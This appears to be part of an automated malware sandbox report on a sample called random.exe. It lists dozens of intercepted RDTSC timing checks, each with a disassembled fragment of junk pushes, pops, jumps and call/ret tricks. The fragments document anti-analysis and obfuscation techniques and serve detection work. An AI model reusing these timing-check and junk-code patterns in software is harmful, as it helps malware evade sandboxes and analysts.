Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B7DB97 second address: B7DB9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B7DD02 second address: B7DD08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B7DD08 second address: B7DD0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B7DD0E second address: B7DD22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007FBC8CC0CD3Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B7DE8E second address: B7DE92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B7DFF5 second address: B7E007 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CC0CD3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B7E007 second address: B7E027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FBC8CB4EEF8h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B7E2A7 second address: B7E2AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B7E2AB second address: B7E2B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B7E2B1 second address: B7E2F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CC0CD3Dh 0x00000007 jnl 00007FBC8CC0CD42h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jbe 00007FBC8CC0CD42h 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007FBC8CC0CD3Ah 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FBC8CC0CD3Dh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B7E716 second address: B7E71C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B7EB99 second address: B7EBAC instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBC8CC0CD38h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B7EBAC second address: B7EBB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B7EBB0 second address: B7EBC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FBC8CC0CD3Eh 0x0000000c jbe 00007FBC8CC0CD36h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B7EBC8 second address: B7EBCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B7F65D second address: B7F661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B7F661 second address: B7F66B instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBC8CB4EEE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B7F66B second address: B7F6B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FBC8CC0CD49h 0x00000010 popad 0x00000011 jbe 00007FBC8CC0CD50h 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B7F6B6 second address: B7F701 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CB4EEF9h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FBC8CB4EEEFh 0x00000010 push eax 0x00000011 js 00007FBC8CB4EEE6h 0x00000017 pushad 0x00000018 popad 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FBC8CB4EEF1h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B7FA63 second address: B7FA68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B7FA68 second address: B7FA85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CB4EEF6h 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B82E69 second address: B82E7D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBC8CC0CD3Ch 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8C79A second address: B8C7A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B5368A second address: B536A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBC8CC0CD44h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8C30B second address: B8C31B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 js 00007FBC8CB4EEE6h 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8C31B second address: B8C334 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBC8CC0CD3Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8C4A7 second address: B8C4C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBC8CB4EEF0h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d pushad 0x0000000e jg 00007FBC8CB4EEE6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8C64B second address: B8C65B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 ja 00007FBC8CC0CD5Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8C65B second address: B8C65F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8C65F second address: B8C679 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CC0CD46h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8EEFA second address: B8EEFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8EEFE second address: B8EF24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007FBC8CC0CD4Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8EF24 second address: B8EF2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8F2CE second address: B8F2D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8F46F second address: B8F483 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC8CB4EEF0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8F8A1 second address: B8F8C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FBC8CC0CD44h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8F956 second address: B8F992 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBC8CB4EEE8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebx 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FBC8CB4EEE8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 sub dword ptr [ebp+12442379h], eax 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push edx 0x00000033 pop edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8F992 second address: B8F998 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8FB63 second address: B8FB6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8FB6D second address: B8FB71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8FD1C second address: B8FD54 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FBC8CB4EEFEh 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 jmp 00007FBC8CB4EEEEh 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8FD54 second address: B8FD5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8FD5A second address: B8FD5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8FE3E second address: B8FE43 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8FE43 second address: B8FE51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8FF15 second address: B8FF29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CC0CD40h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B8FFE5 second address: B8FFE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B90CC9 second address: B90CCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B90CCD second address: B90CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B93524 second address: B93528 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B93528 second address: B93592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FBC8CB4EEF4h 0x0000000d nop 0x0000000e clc 0x0000000f xor dword ptr [ebp+122D1B95h], edi 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007FBC8CB4EEE8h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 sub di, 1A31h 0x00000036 push 00000000h 0x00000038 mov edi, dword ptr [ebp+122D1C4Ch] 0x0000003e xchg eax, ebx 0x0000003f jmp 00007FBC8CB4EEEFh 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B93F70 second address: B93F81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC8CC0CD3Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B93F81 second address: B93FE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jo 00007FBC8CB4EEF0h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jnl 00007FBC8CB4EEE6h 0x00000018 popad 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007FBC8CB4EEE8h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 0000001Ch 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 add esi, dword ptr [ebp+122DB663h] 0x0000003a push 00000000h 0x0000003c mov di, 1DDFh 0x00000040 push 00000000h 0x00000042 pushad 0x00000043 cld 0x00000044 sub edi, dword ptr [ebp+122D36A5h] 0x0000004a popad 0x0000004b push eax 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FBC8CB4EEEAh 0x00000054 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B9499D second address: B949A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B976D7 second address: B976DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B976DC second address: B976E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B977BC second address: B977DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FBC8CB4EEF9h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B9887D second address: B98887 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBC8CC0CD36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B9B60F second address: B9B613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B9B613 second address: B9B61D instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBC8CC0CD36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B9B61D second address: B9B623 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B9B623 second address: B9B67F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CC0CD40h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007FBC8CC0CD38h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 cmc 0x00000029 add dword ptr [ebp+122D27BDh], eax 0x0000002f push 00000000h 0x00000031 movzx edi, dx 0x00000034 xchg eax, esi 0x00000035 jbe 00007FBC8CC0CD3Ah 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jng 00007FBC8CC0CD3Ch 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B9B67F second address: B9B683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B9B792 second address: B9B7A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FBC8CC0CD36h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B9B7A7 second address: B9B7AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B9B873 second address: B9B879 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B9C81D second address: B9C841 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 je 00007FBC8CB4EEE6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 jnp 00007FBC8CB4EEECh 0x00000016 push eax 0x00000017 push edx 0x00000018 js 00007FBC8CB4EEE6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B9E6FE second address: B9E704 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B9E704 second address: B9E70F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FBC8CB4EEE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B9D7B4 second address: B9D7B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B9F5F0 second address: B9F5F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B9E80E second address: B9E812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B9F5F4 second address: B9F636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 movzx ebx, cx 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007FBC8CB4EEE8h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 mov di, dx 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+122D279Bh], ebx 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushad 0x00000036 popad 0x00000037 jnc 00007FBC8CB4EEE6h 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B9E812 second address: B9E816 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B9E816 second address: B9E81C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B9E81C second address: B9E831 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBC8CC0CD40h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BA0543 second address: BA0565 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CB4EEF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B9F7AF second address: B9F844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D1FEDh], esi 0x0000000f sub dword ptr [ebp+122D2FC7h], eax 0x00000015 push dword ptr fs:[00000000h] 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007FBC8CC0CD38h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 00000016h 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 jmp 00007FBC8CC0CD47h 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 mov di, 7ADEh 0x00000046 mov eax, dword ptr [ebp+122D0CA9h] 0x0000004c push FFFFFFFFh 0x0000004e push 00000000h 0x00000050 push ebp 0x00000051 call 00007FBC8CC0CD38h 0x00000056 pop ebp 0x00000057 mov dword ptr [esp+04h], ebp 0x0000005b add dword ptr [esp+04h], 00000018h 0x00000063 inc ebp 0x00000064 push ebp 0x00000065 ret 0x00000066 pop ebp 0x00000067 ret 0x00000068 sub dword ptr [ebp+122D2D67h], edx 0x0000006e nop 0x0000006f push eax 0x00000070 push edx 0x00000071 je 00007FBC8CC0CD3Ch 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B9F844 second address: B9F848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B9F848 second address: B9F867 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBC8CC0CD3Ch 0x00000008 jnp 00007FBC8CC0CD36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FBC8CC0CD3Ch 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BA07F0 second address: BA0810 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 ja 00007FBC8CB4EEE6h 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 push edx 0x00000016 pop edx 0x00000017 popad 0x00000018 jnp 00007FBC8CB4EEECh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BA17D2 second address: BA17DD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BA373C second address: BA3740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: BA27DE second address: BA27E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FBC8CC0CD36h 0x0000000a popad 0x0000000b rdtsc
